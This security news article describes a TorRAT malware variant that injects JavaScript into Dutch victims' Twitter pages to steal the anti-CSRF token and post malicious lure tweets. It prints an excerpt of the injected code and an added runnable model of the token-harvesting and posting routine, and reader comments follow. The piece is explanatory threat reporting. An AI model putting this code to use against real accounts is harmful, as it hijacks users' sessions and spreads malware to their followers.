
Dana Tamir, Enterprise Security Director for Trusteer, has recently uncovered a variation of the TorRAT banking malware that has been configured to target Twitter users. The malware, which is already running on the victim's machine, works by "injecting Javascript code into the victim’s Twitter account page", Tamir says, adding that it "collects the user’s authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim". In other words this is a man-in-the-browser attack rather than a flaw in Twitter itself: the injected script runs inside the logged-in page, so it can read the anti-CSRF token the page already holds (the authenticity_token in the excerpt below) and its requests ride on the victim's own session, indistinguishable on the server side from a tweet the user typed. These tweets are used, of course, to spread the malware within the social networking circle by leveraging the trust that is implicit in such networks. Twitter users, generally speaking, follow people and accounts that they trust. When these accounts are compromised by such an attack it becomes quite easy to persuade followers to click through to drive-by malware pages, simply courtesy of the level of implied trust invested in the original poster.

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as "Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris", which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary", followed by a malicious link.
Of course, the attack vector will most likely soon change as other groups adopt the methodology and adapt the code accordingly.

Dana Tamir provided an excerpt from the injected JavaScript code to highlight what is being done:

function _PostTweet() {
    // Read Twitter's anti-CSRF token from the hidden form field on the
    // page the script was injected into (the script runs in-page, so the
    // token is simply there to be read)
    var a = $('input[name="authenticity_token"]').val();
    // Only post if a token was found; the request is same-origin, so the
    // browser attaches the victim's session cookies automatically
    a.length > 0 && $.post("/i/tweet/create", {
        authenticity_token: a,
        place_id: "",
        status: _GetRndMsg()   // lure text chosen elsewhere in the injected code (not shown)
    }).always(function () {
        // Flag the message as sent, persist that state (ar and SetO are
        // defined in parts of the injected code not shown here) and reload
        ar[0].msgsent = 1, SetO(), window.location.href = window.location.href
    })
}
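To make the flow in the excerpt concrete, here is an added example (written for this page, not code from Trusteer or from the malware itself) that models each step of _PostTweet() as a plain function that runs offline under Node.js: harvesting the token from the page, building the same-origin POST, and the msgsent guard that stops the script re-posting after the forced reload. It also includes a minimal model of the server-side CSRF check to show why that check passes. The page HTML, the lure texts, the token value and the example.invalid links are all constructed sample data, and harvestToken, pickLure, buildTweetRequest, serverAcceptsCsrf and runInjectedRoutine are names chosen here, not names from the injected code.

```javascript
// Added example (not from the original article, Trusteer, or the malware):
// the behaviour of the injected _PostTweet() routine modelled as functions
// that can be run and checked offline. All data below is constructed.

// Constructed stand-in for the victim's logged-in Twitter page. The hidden
// authenticity_token input is the anti-CSRF token; any script running in
// the page, including an injected one, can read it.
const SAMPLE_PAGE = `
<html><body>
  <form action="/i/tweet/create" method="post">
    <input type="hidden" name="authenticity_token" value="c0ffee1234deadbeef">
    <textarea name="status"></textarea>
  </form>
</body></html>`;

// Constructed lure texts standing in for whatever _GetRndMsg() returned.
const LURES = [
  "Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris http://example.invalid/x",
  "Tweede lokbericht http://example.invalid/y",
];

// Equivalent of $('input[name="authenticity_token"]').val(): pull the CSRF
// token out of the page the script is running in. Returns "" when absent,
// which is why the original guards on a.length > 0.
function harvestToken(html) {
  const m = html.match(/<input[^>]*name="authenticity_token"[^>]*value="([^"]*)"/i);
  return m ? m[1] : "";
}

// Deterministic stand-in for _GetRndMsg(): pick a lure by index.
function pickLure(index) {
  return LURES[index % LURES.length];
}

// The same-origin POST the excerpt makes via $.post("/i/tweet/create", {...}).
// jQuery form-encodes the object; the browser adds the victim's session
// cookies on its own, so the token is the only thing the script had to steal.
function buildTweetRequest(token, status) {
  const body = new URLSearchParams({ authenticity_token: token, place_id: "", status });
  return { method: "POST", path: "/i/tweet/create", body: body.toString() };
}

// Minimal model of a server-side CSRF check: the token in the body must
// match the one issued to that session. A man-in-the-browser request passes
// because it read the genuine token from the genuine page.
function serverAcceptsCsrf(request, issuedToken) {
  const params = new URLSearchParams(request.body);
  return params.get("authenticity_token") === issuedToken;
}

// One run of the injected routine against a page. The msgsent flag models
// ar[0].msgsent from the excerpt: once set, the reloaded page does not post
// again. Returns a record of what happened so it can be checked.
function runInjectedRoutine(state, html, lureIndex) {
  if (state.msgsent) return { posted: false, reason: "already sent" };
  const token = harvestToken(html);
  if (token.length === 0) return { posted: false, reason: "no token on page" };
  const request = buildTweetRequest(token, pickLure(lureIndex));
  state.msgsent = 1; // what the .always() callback sets before reloading
  return { posted: true, request };
}

// Usage: simulate the first page load (posts) and the reload (does not).
const sessionState = {};
const first = runInjectedRoutine(sessionState, SAMPLE_PAGE, 0);
const second = runInjectedRoutine(sessionState, SAMPLE_PAGE, 1);
console.log(first.posted, serverAcceptsCsrf(first.request, "c0ffee1234deadbeef"));
console.log(second.posted, second.reason);
```

The point the model makes is the one Tamir's description implies: a CSRF token protects against requests forged from another origin, not against a script that is already executing inside the victim's page with the victim's cookies, so the defence has to sit on the endpoint rather than on Twitter's servers.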

Trusteer advises that enterprise exploit prevention technology, which stops vulnerable endpoint applications (browser clients) from being exploited and malware from being downloaded and executed, is the best way to stop such attacks dead. "External sources like web content and email attachments, which can include a hidden exploit in the form of embedded code, should never be trusted," Trusteer says. "Such content should only be opened while monitoring the application state to ensure it is operating legitimately."

As Editorial Director and Managing Analyst with IT Security Thing I am putting more than two decades of consulting experience into providing opinionated insight regarding the security threat landscape for IT security professionals. As an Editorial Fellow with Dennis Publishing, I bring more than two decades of writing experience across the technology industry into publications such as Alphr, IT Pro and (in good old fashioned print) PC Pro. I also write for SC Magazine UK and Infosecurity, as well as The Times and Sunday Times newspapers. Along the way I have been honoured with a Technology Journalist of the Year award, and three Information Security Journalist of the Year awards. Most humbling, though, was the Enigma Award for 'lifetime contribution to IT security journalism' bestowed on me in 2011.


At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as "Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.

This sounds like an isolated incident, maybe not if it starts spreading, but it's good to know, so I can be aware of this JavaScript code.

Not sure why they used this phrase:

Our new King William will earn even more than Beatrix. Check his salary

What is the meaning behind it?

To me it meant

Wee kin william will earn even mooar than beytrix. check 'is salary 


Interesting. But how does the js get into a stored post in the first place? How is the script injected? I can understand that the js code is sent to the server, but doesn't Twitter screen and strip any possible malicious code?
